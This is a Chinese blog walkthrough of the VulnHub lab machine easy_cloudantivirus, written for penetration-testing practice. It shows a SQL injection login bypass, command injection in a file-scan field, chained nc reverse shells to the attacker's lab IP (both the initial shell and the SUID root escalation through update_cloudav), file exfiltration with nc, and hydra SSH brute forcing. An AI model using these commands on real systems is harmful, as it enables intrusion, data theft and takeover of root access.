kali之vulhub,easycloudantivirus

已于 2022-05-30 22:17:27 修改
阅读量415 收藏
点赞数
分类专栏: Vulnhub 文章标签: 安全 linux web安全
于 2022-05-07 23:39:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/124629277
版权

目录

一、靶机描述

二、主机发现

三、端口扫描

四、服务版本扫描

五、登录网址

1.对输入框进行特殊字符注入

2.burpsuite抓包

 3.发送到intruter模块下,进行爆破

4.尝试进行注入绕过登录

5.成功绕过登录语句,成功登录

 6.分析命令注入

六、利用远程命令执行漏洞与kali建立连接

1.在kali端侦听两个端口

2. 在防病毒测试界面利用命令注入

七、提权

1.对靶机进行信息收集

2.传输database.sql

(1)侦听一个5555端口并重定向至db.sql

(2)传输文件

(3)结束对5555的侦听,在kali本机中查看db.sql

 3.hydra用户名和密码爆破

(1)创建一个user.txt

(2)创建一个passwd.txt

(3)hydra开始爆破

八、利用suid提取

1.信息收集

2.查看一下源代码

 3.在参数中进行命令注入

一、靶机描述

蛮力是暴力破解

二、主机发现

这次用arping这个工具来扫描 ,发现192.168.43.15有回包,确定是我们虚拟机同网段上的靶机。

三、端口扫描

sudo nmap -p- 192.168.43.15

扫到两个端口 ,对这两个端口进行服务版本的扫描

四、服务版本扫描

sudo nmap -p22,8080 -sV  192.168.43.15

五、登录网址

1.对输入框进行特殊字符注入

把键盘上的特殊字符全部跑一遍,可以手动输入,也可以写入字典跑

2.burpsuite抓包

 3.发送到intruter模块下,进行爆破

可以发现 当 " 时长度有所不同,报错了。而且报出了许多敏感信息

这里就是我们输入的字符进行的数据库查询语句,根据这个语句我们可以构造注入payload实现永久为真来绕过判定

4.尝试进行注入绕过登录

因为这里是让我们输入邀请码登录来进行测试,那么我们可以利用 上诉结果来尝试进行语句的闭合

" or 1=1--

5.成功绕过登录语句,成功登录

 6.分析命令注入

这个页面是让我们输入文件名进行防病毒测试,而且这些文件很可能是服务端所存在的真实的文件,并且在服务端会执行类似 avscan fillename 这样的一个命令来执行防病毒查杀功能。所以我们可以构造

cat | ls

命令成功注入

六、利用远程命令执行漏洞与kali建立连接

用nc串联与kali建立一个连接

1.在kali端侦听两个端口

2. 在防病毒测试界面利用命令注入

python | nc 192.168.43.27 4444 | /bin/bash | nc 192.168.43.27 3333

 nc连接kali的4444端口,并在这个建立连接中输入的命令通过管道符给到靶机的bash下去解析,然后把解析执行结果传给通过3333端口建立的连接,从而实现对靶机的一个控制。

七、提权

1.对靶机进行信息收集

查看一波发现不太对,有password,但显示有问题,下载到kali用sqlite3打开查看

2.传输database.sql

(1)侦听一个5555端口并重定向至db.sql

nc -nvlp 5555 > db1.sql

(2)传输文件

nc 192.168.43.27 5555 < database.sql

(3)结束对5555的侦听,在kali本机中查看db.sql

得到了一些密码

去查看一下可用shell登录的用户

cat /etc/passwd | grep "bash"

 3.hydra用户名和密码爆破

(1)创建一个user.txt

(2)创建一个passwd.txt

把刚刚查到的密码输入进去即可

(3)hydra开始爆破

0条有效密码,都不对。提权失败。

hydra -p passwd.txt -u user.txt ssh://192.168.43.15

八、利用suid提取

1.信息收集

在对上级目录的信息收集下

,我们发现了一个属主是root的suid权限的可执行文件,我们可以利用suid权限继承的特性(例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。),来拿到root权限

2.查看一下源代码

构成了一条利用了freshclam来执行参数的命令。

 3.在参数中进行命令注入

侦听两个端口

nc -nvlp 5555

nc -nvlp 6666

利用suid权限继承和nc串联建立连接获得root权限

./update_cloudav "a | nc 192.168.43.27 5555 | /bin/bash | nc 192.168.43.27 6666"

梅_花_七
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 529
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
vulnhub:easy_cloudantivirus靶机
qq_43884092的博客
02-05 191
到/tmp目录下执行bash,获得root权限。靶机:192.168.111.177。本地nc监听,反弹shell。在输入框填入双引号发现报错。用户家目录存放该程序源码。配合管道符可以执行命令。查找suid权限的文件。同样配合管道符执行命令。
VulnHub靶机-easy_cloudantivirus 打靶
最新发布
rumil的博客
04-12 785
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
Kali安装配置vulhub
RexHa的博客
02-25 2889
kali搭建vulhub漏洞靶场环境全过程记录
【网络安全 | Kali】基于Docker的Vulhub安装教程指南
等风来
01-02 2696
Vulhub的搭建基于docker及docker-compose权限升级新软件安装HTTPS协议和CA证书安装docker验证docker是否安装成功安装pip安装docker-compose查看安装的docker-compose版本 下载Vulhub文件 查看Vulhub的漏洞靶场 切换到要启动的漏洞的目录
(一)easy_cloudantivirus靶机渗透练习
qq_69746732的博客
01-04 974
easy_cloudantivirus靶机渗透练习
Vulhub-master
08-08
kali linux 下搭建 Vulhub 靶场(用于无法科学上网导致的下载失败)
网络安全之配置Kali教程
12-23
kali安装 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来...
kali 1800W超强字典
04-07
kali 1800W超强字典
KALI渗透测试之密码破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
Kali系列之workstations环境下安装kali.docx
12-06
Kali Linux是基于Debian GNU/Linux的企业级安全审计Linux发行版。Kali的目标用户是安全专业人员和IT管理员,其能够应用于高级渗透测试,取证分析和安全审计等领域。 Kali Linux预装了许多渗透测试软件,包括nmap 、...
VulnHub靶机-easy_cloudantivirus | 红队打靶02
qq_47289634的博客
07-20 248
靶机地址:攻击机kali IP:192.168.56.102这里是用的netdiscover+nmap 使用nmap对目标主机进行信息收集,看到开放了22,8080端口,分别运行了ssh和http服务 访问一下8080端口,发现是一个病毒防护的网站,需要输入邀请码 看到框就试试看有没有SQL注入,抓包,发送到burp中的测试模块爆破一下 看到有些响应长度很大的明显不一样,复制pyload,在网页打开看一下 直接看到了sql语句,根据sql语句构造闭合,在配合万能密码登录到后台, ,这里我们输入
打靶第二周-easy_cloudantivirus
wcwdnmdnmd的博客
09-14 1764
easy_cloudantivirus靶机地址攻击手段所用工具开始攻击主机发现sql注入 靶机地址 easy_cloudantivirus 攻击手段 端口扫描 WEB侦查 SQL注入 命令注入 密码爆破 代码审计 NC串联 本地提权 所用工具 arping nmap 开始攻击 主机发现 使用arping来发现 因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段 也可使用nmap 192.168.
kali linux安装vulhub
AboutLzs的博客
04-13 5039
kali linuxvulhub环境搭建,详解带截图!
kali上搭建vulhub漏洞靶场
Qeminco的博客。
01-02 8433
vulhub漏洞靶场搭建前言vulhub简介1.docker1.1了解docker1.2 apt命令与apt-get命令1.3开始安装docker1.4安装pip1.5安装docker-compose2.下载vulhub3.互ping测试3.关闭靶场 前言 众所周知,想要学好网络安全,搭建漏洞靶场是必不可少的。复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的渗透测试能力。下面我在kali中演示如何详细安装漏洞靶场Vulhubvulhub简介 Vulhub是一个基于docker和docker-comp
0x02-easy_cloudantivirus
rec09er的博客
04-12 1006
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
kali搭建漏洞靶场Vulhub
薄酒清欢的博客
08-18 1044
网络安全的学习过程中,靶场扮演着至关重要的角色。通过靶场复现各种漏洞,可以帮助初学者更好的摸清漏洞产生的原理,进而加深对漏洞的理解,提高自己的漏洞利用能力。后续我将用一步一截图的方式演示如何在kali中搭建漏洞靶场Vulhub
easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2142
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
kali安装vulhub靶场搭建
10-19
kali下搭建Vulhub靶场需要进行以下几个步骤: 1. 确保已经安装了docker和docker-compose,如果没有安装可以使用以下命令进行安装: apt-get install docker.io apt-get install docker-compose 2. 下载Vulhub,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值